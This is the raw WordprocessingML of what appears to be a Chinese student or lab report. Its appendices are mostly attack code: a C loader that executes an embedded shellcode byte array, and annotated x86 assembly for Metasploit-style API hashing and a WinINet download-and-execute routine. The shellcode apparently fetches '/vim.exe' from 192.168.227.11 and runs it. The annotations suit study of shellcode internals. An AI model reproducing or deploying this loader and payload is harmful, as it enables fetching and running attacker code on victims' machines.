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rPr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附录一：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pP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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include&lt;windows.h&gt;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>#include&lt;stdio.h&gt;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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t>#include&lt;string.h&gt;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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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 xml:space="preserve">char code[] = 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>"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"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>"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"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>"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"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>"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"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>"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"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>"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"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>"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"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>"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"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>"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"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>"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"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>"\x77\x69\x6e\x69\x89\xe6\x54\x68\x4c\x77\x26\x07\xff\xd5\x31"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>"\xff\x57\x57\x57\x57\x56\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x60"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>"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x6a\x50\x53\x50\x68\x57"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>"\x89\x9f\xc6\xff\xd5\xeb\x4f\x59\x31\xd2\x52\x68\x00\x32\x60"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>"\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89"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>"\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a\x04\x50\x6a"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>"\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57\x57\x57\x57"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>"\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1c\x4b\x0f\x84"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>"\x79\x00\x00\x00\xeb\xd1\xe9\x8b\x00\x00\x00\xe8\xac\xff\xff"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>"\xff\x2f\x76\x69\x6d\x2e\x65\x78\x65\x00\xeb\x6b\x31\xc0\x5f"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>"\x50\x6a\x02\x6a\x02\x50\x6a\x02\x6a\x02\x57\x68\xda\xf6\xda"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>"\x4f\xff\xd5\x93\x31\xc0\x66\xb8\x04\x03\x29\xc4\x54\x8d\x4c"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>"\x24\x08\x31\xc0\xb4\x03\x50\x51\x56\x68\x12\x96\x89\xe2\xff"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>"\xd5\x85\xc0\x74\x2d\x58\x85\xc0\x74\x16\x6a\x00\x54\x50\x8d"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>"\x44\x24\x0c\x50\x53\x68\x2d\x57\xae\x5b\xff\xd5\x83\xec\x04"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>"\xeb\xce\x53\x68\xc6\x96\x87\x52\xff\xd5\x6a\x00\x57\x68\x31"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>"\x8b\x6f\x87\xff\xd5\x6a\x00\x68\xe0\x1d\x2a\x0a\xff\xd5\xe8"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>"\x90\xff\xff\xff\x72\x75\x6e\x64\x31\x31\x2e\x65\x78\x65\x00"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>"\xe8\x0b\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x32"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>"\x37\x2e\x31\x31\x00";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>int main(int argc, char **argv)//shellcode loader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>{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ab/>
        <w:t>int(*func)();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ab/>
        <w:t>func = (int (*)()) code;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ab/>
        <w:t>(int)(*func)();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr>
          <w:lang w:val="zh-TW" w:eastAsia="zh-TW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>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr>
          <w:lang w:val="zh-TW" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr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附录二：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="正文"/>
        <w:rPr/>
      </w:pP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</w:rPr>
        <w:t>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通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>PEB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查询程序调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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的地址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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api_call:;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov ebp, esp           ; Create a new stack frame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函数调用，将基址指针赋给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ebp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</w:rPr>
        <w:t xml:space="preserve">xor edx, edx           ; Zero EDX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清空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
        </w:rPr>
        <w:t>EDX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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov edx, fs:[edx+30h]   ; Get a pointer to the PEB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【通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>fs:[30h]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获取当前进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>_PEB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结构】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Process Environment Block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US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进程环境块；存放进程信息，每个进程都有自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>PEB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信息。位于用户地址空间。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</w:rPr>
        <w:t xml:space="preserve">mov edx, [edx+0Ch]      ; Get PEB-&gt;Ldr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【通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>_PEB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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ldr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成员获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_PEB_LDR_DATA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结构】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ldr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地址存放一些指向动态链接库信息的链表地址；能得到进程加载的所有模块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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov edx, [edx+14h]      ; Get the first module from the InMemoryOrder module list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【根据加载顺序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只需要向前走两个模块就到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LDR_DATA_TABLE_ENTRY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此时就是指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDR_DATA_TABLE_ENTRY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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList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字段】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>next_mod: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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov esi, [edx+28h]      ; Get pointer to modules name (unicode string)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【在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>0x028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处获取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de-DE"/>
        </w:rPr>
        <w:t>DllName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的名称字符串】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">movzx ecx, word [edx+26h] ; Set ECX to the length we want to check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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MaximumLength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】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xor edi, edi           ; Clear EDI which will store the hash of the module name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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>edi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存放</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash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后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>dll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名称】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</w:rPr>
        <w:t>loop_modname:              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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>dll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首字母为小写时执行】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</w:rPr>
        <w:t>xor eax, eax           ; Clear EAX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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lodsb                  ; Read in the next byte of the name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp al, 'a'            ; Some versions of Windows use lower case module names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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jl not_lowercase       ;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sub al, 0x20           ; If so normalise to uppercase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</w:rPr>
        <w:t>not_lowercase:             ;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ror edi, 13            ; Rotate right our hash value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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add edi, eax           ; Add the next byte of the name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loop loop_modname      ; Loop untill we have read enough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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; We now have the module hash computed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【计算名称哈希值】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">push edx               ; Save the current position in the module list for later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【存储调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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位置和名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash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】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push edi               ; Save the current module hash for later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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; Proceed to iterate the export address table,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【继续迭代导出地址表】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov edx, [edx+16]      ; Get this modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov eax, [edx+60]      ; Get PE header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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>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头】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add eax, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov eax, [eax+120]     ; Get export tables RVA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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>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文件的相对虚拟地址】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test eax, eax          ; Test if no export address table is present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【找导入表】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jz get_next_mod1       ; If no EAT present, process the next module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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add eax, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push eax               ; Save the current modules EAT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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mov ecx, [eax+24]      ; Get the number of function names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【获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>dll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内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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个数和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>RVA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】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov ebx, [eax+32]      ; Get the rva of the function names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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add ebx, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; Computing the module hash + function hash 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</w:rPr>
        <w:t>get_next_func:             ;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dec ecx                ; Decrement the function name counter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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov esi, [ebx+ecx*4]   ; Get rva of next module name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add esi, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor edi, edi           ; Clear EDI which will store the hash of the function name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; And compare it to the one we want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</w:rPr>
        <w:t>loop_funcname:             ;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</w:rPr>
        <w:t>xor eax, eax           ; Clear EAX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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lodsb                  ; Read in the next byte of the ASCII function name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ror edi, 13            ; Rotate right our hash value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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add edi, eax           ; Add the next byte of the name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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">jne loop_funcname      ; If we have not reached the null terminator, continue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【串接获得完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function 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哈希】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add edi, [ebp-8]       ; Add the current module hash to the function hash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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for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【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash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对比】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jnz get_next_func      ; Go compute the next function hash if we have not found it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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; If found, fix up stack, call the function and then value else compute the next one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="zh-CN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>…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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop eax                ; Restore the current modules EAT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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov ebx, [eax+36]      ; Get the ordinal table rva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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add ebx, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov ebx, [eax+28]      ; Get the function addresses table rva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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add ebx, edx           ; Add the modules base address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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov eax, [ebx+4*ecx]   ; Get the desired functions RVA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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">add eax, edx           ; Add the modules base address to get the functions actual VA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【获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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真实地址】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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; We now fix up the stack and perform the call to the desired function...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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>finish: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 xml:space="preserve">  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad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【重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>EAX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】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 xml:space="preserve">  pop ebx                ; Clear off the current modules hash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 xml:space="preserve">  pop ebx                ; Clear off the current position in the module list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 xml:space="preserve">  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered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 xml:space="preserve">  pop ecx                ; Pop off the origional return address our caller will have pushed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 xml:space="preserve">  pop edx                ; Pop off the hash value our caller will have pushed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 xml:space="preserve">  push ecx               ; Push back the correct return value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 xml:space="preserve">  jmp eax                ; Jump into the required function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 xml:space="preserve">  ; We now automagically return to the correct caller...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>get_next_mod:              ;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 xml:space="preserve">  pop eax                ; Pop off the current (now the previous) modules EAT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【！！！】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>get_next_mod1:             ;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 xml:space="preserve">  pop edi                ; Pop off the current (now </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="default"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>′</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>07 previous) modules hash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 xml:space="preserve">  pop edx                ; Restore our position in the module list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 xml:space="preserve">  mov edx, [edx]         ; Get the next module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 xml:space="preserve">  jmp.i8 next_mod        ; Process this module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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>; actual routine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>start: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pop ebp                ; get ptr to block_api routine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>; based on HDM's block_reverse_https.asm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>load_wininet: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 xml:space="preserve">  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.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【要使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>dll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】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push 0x696e6977        ; ...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 xml:space="preserve">  mov esi, esp           ; Save a pointer to wininet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 xml:space="preserve">  push esp               ; Push a pointer to the "wininet" string on the stack.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push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" 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【利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA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加载对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0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函数】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call ebp               ; LoadLibraryA( "wininet" )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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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da-DK"/>
        </w:rPr>
        <w:tab/>
        <w:t>internetopen:;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【初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>WinINet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函数】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pt-PT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  xor edi,edi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push edi               ; DWORD dwFlags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push edi               ; LPCTSTR lpszProxyBypass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push edi               ; LPCTSTR lpszProxyName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push edi               ; DWORD dwAccessType (PRECONFIG = 0)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push esi               ; LPCTSTR lpszAgent ("wininet\x00")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push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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 xml:space="preserve">  jmp.i8 dbl_get_server_host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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>internetconnect:;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【建立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da-DK"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet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的连接】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 xml:space="preserve">  pop ebx                ; Save the hostname pointer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xor ecx, ecx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push ecx               ; DWORD_PTR dwContext (NULL)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push ecx               ; dwFlags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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push #{protoflags[proto]}</w:t>
        <w:tab/>
        <w:t>; DWORD dwService (INTERNET_SERVICE_HTTP or INTERNET_SERVICE_FTP)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push ecx               ; password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push ecx               ; username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push #{port_nr}        ; PORT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push ebx               ; HOSTNAME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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push eax               ; HINTERNET hInternet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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )  Windows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应用程序网络相关模块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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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 xml:space="preserve">  jmp.i8 get_server_uri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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>httpopenrequest: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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  pop ecx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xor edx, edx            ; NULL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push edx                ; dwContext (NULL)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#{dwflags_asm}          ; dwFlags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push edx                ; accept types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push edx                ; referrer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push edx                ; version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push ecx                ; url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push edx                ; method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push eax                ; hConnection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push 0x3B2E55EB         ; hash( "wininet.dll", "HttpOpenRequestA" )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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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mov esi, eax            ; hHttpRequest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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>set_retry: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 xml:space="preserve">  push 0x10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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  pop ebx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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &amp;dwFlags, sizeof (dwFlags) );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>set_security_options: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 xml:space="preserve">  push 0x00003380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mov eax, esp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push 4                 ; sizeof(dwFlags)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push eax               ; &amp;dwFlags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de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)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push esi               ; hRequest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push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>httpsendrequest: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xor edi, edi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 xml:space="preserve">  push edi               ; optional length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push edi               ; optional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push edi               ; dwHeadersLength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push edi               ; headers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push esi               ; hHttpRequest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push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )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it-IT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  call ebp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test eax,eax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 xml:space="preserve">  jnz create_file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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>try_it_again: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dec ebx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 xml:space="preserve">  jz thats_all_folks</w:t>
        <w:tab/>
        <w:t>; failure -&gt; exit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 xml:space="preserve">  jmp.i8 set_security_options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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>dbl_get_server_host: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 xml:space="preserve">  jmp get_server_host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/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:cs="Menlo" w:hAnsi="Menlo" w:eastAsia="Menlo"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:tab/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>get_server_uri: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 xml:space="preserve">  call httpopenrequest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/>
        <w:tab/>
      </w:r>
      <w:r>
